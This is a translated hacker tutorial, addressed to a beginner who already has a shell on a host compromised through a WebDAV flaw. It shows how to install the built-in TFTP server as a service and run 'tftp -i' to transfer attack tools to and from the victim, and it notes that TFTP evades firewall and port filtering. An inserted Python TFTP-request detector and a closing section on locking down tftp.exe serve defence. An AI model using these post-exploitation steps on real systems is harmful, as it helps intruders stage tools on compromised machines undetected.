A newbie (cainiao) got a shell by exploiting the popular WebDAV vulnerability. After adding an administrator account, however, he found that he could not connect to ipc$, could not enable ipc$ from cmd, and got a startup error instead. So how to upload files? He had heard that ftp could be used, but ftp cannot be driven interactively from a cmd shell, which trips people up: once ftp is started, doesn't cmd just hang there? The newbie is dumbfounded. Some people say to use the echo command to write a script that downloads the program from a given ftp server, and then run it with ftp -s:file. That works in practice, but the newbie finds it a bit troublesome. What should he do?
At this moment a voice sounds in his ear: use tftp and be happy. Tftp?!@#$^&*... The newbie thinks about it for a while: I have heard of ftp, but what is tftp? Today I will explain to newbies how to install and use it, its role in intrusion, and my own experience with it.
I. Introduction to TFTP:
Tftp is short for Trivial File Transfer Protocol, which translates as "simple file transfer protocol". It is a protocol in the TCP/IP family for transferring simple files between a client and a server. Although it has few features, it helps a lot in our intrusions.
Unlike the Ftp server that comes with Win2K or the popular Serv-U, Tftp runs over UDP; compared with Ftp, TFTP is much smaller. Its drawback is that its data transfer is not reliable: it provides no access authorization or authentication mechanism and relies on timeout-and-retransmit to make sure data arrives. It uses UDP port 69. But precisely because it uses a UDP port, it easily slips past firewall restrictions and the port filtering of IP Security Policies, so it can be used flexibly during an intrusion. That is why I want to introduce it to you.
II. Enabling the TFTP service:
First obtain Administrator privileges. instsrv is a small, handy tool from Microsoft; we can use it to start the Tftp service on the compromised host, so we don't have to go looking for a tftp server. On Win2K we can find tftp.exe under winnt\system32 and tftp.exe under winnt\system32\dllcache. Of course, you can also enter dir %windir%\tftp* /s on the command line (this searches all subdirectories of %windir% for programs whose names start with tftp). The output on my machine is as follows:
Volume in drive C has no label. Volume Serial Number is 287C-D610.
Directory of C:\WINNT\system32
17,680 tftp.exe
1 File(s) 17,680 bytes
Directory of C:\WINNT\system32\dllcache
17,680 tftp.exe
19,728 tftpd.exe
2 File(s) 37,408 bytes
As you can see, there is a tftpd.exe program, which is the server side of tftp. So how do we start the tftp service on the compromised host? Double-click to run it? No: use instsrv (there is also a GUI version of it). See the figure below.
1: Let's take a look at its help text:
C:\Longker>instsrv.exe
Installs and removes system services from NT
INSTSRV <service name> (<exe location> | REMOVE) [-a <Account Name>] [-p <Account Password>]
Install service example:
INSTSRV MyService C:\MyDir\DiskService.Exe
-OR-
INSTSRV MyService C:\mailsrv\mailsrv.exe -a MYDOMAIN\joebob -p foo
Remove service example:
INSTSRV MyService REMOVE
Then we will install tftp as a service:
C:\Longker>instsrv "Tftp services" c:\winnt\system32\dllcache\tftpd.exe
The service was successfuly added!
Make sure that you go into the Control Panel and use
the Services applet to change the Account Name and
Password that this newly installed service will use
for its Security Context.
In this way we have installed the tftp service under the name Tftp services. Now we start it:
C:\Longker>net start "tftp services"
The Tftp services service is starting.
The Tftp services service was started successfully.
OK, the service started successfully. We can use fport to check which ports are now open:
1524 tftpd -> 69 UDP c:\winnt\system32\dllcache\tftpd.exe
We can see that file transfer uses the UDP protocol and that the open port is 69.
Or we can query it with the following command:
C:\Longker>netstat -an | find "69"
UDP 202.xx.xx.165:69 *:*
After the service has started, a tftpdroot folder is created under the system directory. This is where uploaded files land and where files offered for download are placed.
Here I also recommend a good Tftp server. It has logging and directory settings and shows the transfer progress; most importantly, it is free and runs on multiple platforms.
http://5ihack.vicp.net:88/down/show.asp?id=219
III. How to use Tftp:
TFTP comes with help information:
TFTP [-i] host [GET | PUT] source [destination]
-i Specifies binary image transfer mode (also called
octet). In binary image mode the file is moved
literally, byte by byte. Use this mode when transferring binary files.
host Specifies the local or remote host.
GET Transfers the file destination on the remote host to
the file source on the local host.
PUT Transfers the file source on the local host to
the file destination on the remote host.
source Specifies the file to transfer.
destination Specifies where to transfer the file.
Note:
The -i option transfers files in binary mode. Much exploit code has to be transferred in this mode.
host is the host running the tftp service, either local or remote.
get downloads the file into the current directory, and put uploads the file to the machine running the tftp service. source is the name of the file to download or upload.
Here are a few examples:
C:\Longker>tftp -i 202.xx.xx.165 get SC.exe
Transfer successful: 63248 bytes in 1 second, 63248 bytes/s
This downloads the SC.exe program from the tftp server. The speed is good :)
C:\Longker>tftp -i 202.xx.xx.165 put SC.exe
Transfer successful: 63248 bytes in 1 second, 63248 bytes/s
This is an upload: it sends SC.exe to the tftp server.
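Section I notes that TFTP rides on UDP, has no authentication and slips past port-based filtering, and the notes above describe what a get/put request (and the -i octet mode) looks like. As an added example that is not part of the original article, here is a small Python detector that recognises TFTP read/write requests by their RFC 1350 payload layout rather than by port number, records the filename and transfer mode, and flags executable transfers; the sample datagrams are constructed, not captured.

```python
import struct

# TFTP opcodes (RFC 1350); only read and write requests carry a filename
OPCODE_NAMES = {1: "RRQ (get)", 2: "WRQ (put)"}
VALID_MODES = ("netascii", "octet", "mail")
EXEC_EXTS = (".exe", ".dll", ".bat", ".cmd", ".vbs")

def parse_tftp_request(payload):
    """Parse an RRQ/WRQ payload: 2-byte opcode | filename NUL | mode NUL.
    Returns (opcode, filename, mode), or None if it is not a well-formed request."""
    if len(payload) < 4:
        return None
    (opcode,) = struct.unpack("!H", payload[:2])
    if opcode not in OPCODE_NAMES:
        return None
    fields = payload[2:].split(b"\x00")
    # need filename, mode and the empty field left by the final NUL terminator
    if len(fields) < 3 or not fields[0] or not fields[1]:
        return None
    try:
        filename, mode = fields[0].decode("ascii"), fields[1].decode("ascii").lower()
    except UnicodeDecodeError:
        return None
    return (opcode, filename, mode) if mode in VALID_MODES else None

def scan_datagrams(datagrams):
    """Return one alert per TFTP request among (src_ip, dst_port, payload) records.
    Matching is on payload shape, not port, because TFTP is trivial to move off
    UDP/69; 'octet' (the client's -i switch) plus an executable name stands out."""
    alerts = []
    for src_ip, dst_port, payload in datagrams:
        parsed = parse_tftp_request(payload)
        if parsed is None:
            continue
        opcode, filename, mode = parsed
        alerts.append({"src": src_ip, "port": dst_port, "mode": mode,
                       "request": OPCODE_NAMES[opcode], "file": filename,
                       "nonstandard_port": dst_port != 69,
                       "executable": filename.lower().endswith(EXEC_EXTS)})
    return alerts

# Constructed sample datagrams (not captured traffic): the article's get and put
# of SC.exe in binary mode, a request on an unusual port, and two non-requests.
SAMPLE_DATAGRAMS = [
    ("10.0.0.5", 69, b"\x00\x01SC.exe\x00octet\x00"),
    ("10.0.0.5", 69, b"\x00\x02SC.exe\x00octet\x00"),
    ("10.0.0.9", 4444, b"\x00\x01readme.txt\x00netascii\x00"),
    ("10.0.0.9", 69, b"\x00\x03\x00\x01hello"),     # DATA block, no filename
    ("10.0.0.7", 69, b"M-SEARCH * HTTP/1.1\r\n"),   # not TFTP at all
]
```

Feed real UDP payloads (for example from a packet capture) into scan_datagrams in place of SAMPLE_DATAGRAMS to get the same alert records.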
IV. Answers to related questions:
Because tftp comes with Windows, after intruding into a machine we can use it directly to upload the tools we need, instead of first uploading a helper such as wget (a small tool that downloads programs from a web server) and then using wget to fetch our toolkit.
The problem above is solved, but newbies may still run into trouble. For example, when you try to delete an uploaded file, you get the error: access is denied! What is going on? I can't even delete my own uploaded file, which is absurd. This is because files uploaded and downloaded with tftp have the read-only attribute by default, so we need to run attrib -R on them to clear the read-only attribute before deleting.
As you know, many network worms and hacker attack programs try to obtain command-line execution through some vulnerability, and worms often use the tftp client that ships with Windows to fetch the attack programs or backdoors they need, such as nc. The popular asp Trojan cmd.asp, for example, can also call tftp to download tools and obtain system administrator privileges. Security-minded readers may ask: if my machine is broken into, how can I stop the intruder from using tftp? I will introduce two methods here.
1: Use cacls to restrict which users can run the program.
C:\>cacls
Displays or modifies access control lists (ACLs) of files
CACLS filename [/T] [/E] [/C] [/G user:perm] [/R user [...]]
[/P user:perm [...]] [/D user [...]]
filename Displays ACLs.
/T Changes ACLs of specified files in the current directory and all subdirectories.
/E Edits the ACL instead of replacing it.
/C Continues on access denied errors.
/G user:perm Grants specified user access rights.
Perm can be: R Read W Write C Change (write) F Full control
/R user Revokes specified user's access rights (only valid with /E).
/P user:perm Replaces specified user's access rights.
Perm can be: N None R Read W Write C Change (write) F Full control
/D user Denies specified user access.
Wildcards can be used to specify more than one file in a command. You can specify more than one user in a command.
Based on the help above, we can deny the iusr_computername user permission to run tftp.exe:
C:\>cacls c:\winnt\system32\tftp.exe /D iusr_computername
C:\>cacls c:\winnt\system32\dllcache\tftp.exe /D iusr_computername
Are you sure (Y/N)? Y
processed file: c:\winnt\system32\tftp.exe
processed file: c:\winnt\system32\dllcache\tftp.exe
C:\>tftp
Access is denied.
Obviously we have achieved our goal. In the same way, we can also deny the iusr user access to cmd.exe.
2: Can we simply delete tftp? No: key programs such as tftp.exe are protected by Windows File Protection, so they cannot be removed directly. Here is another method.
Open the services file under %systemroot%\system32\drivers\etc with a text editor and find the tftp line:
bootps 67/udp dhcps # Bootstrap Protocol Server
bootpc 68/udp dhcpc # Bootstrap Protocol Client
tftp 69/udp # Trivial File Transfer
Replace 69/udp with 0/udp, save and exit. Now try again and see whether tftp still works.
How about it? The "Timeout occurred" prompt shows that we have reached our goal.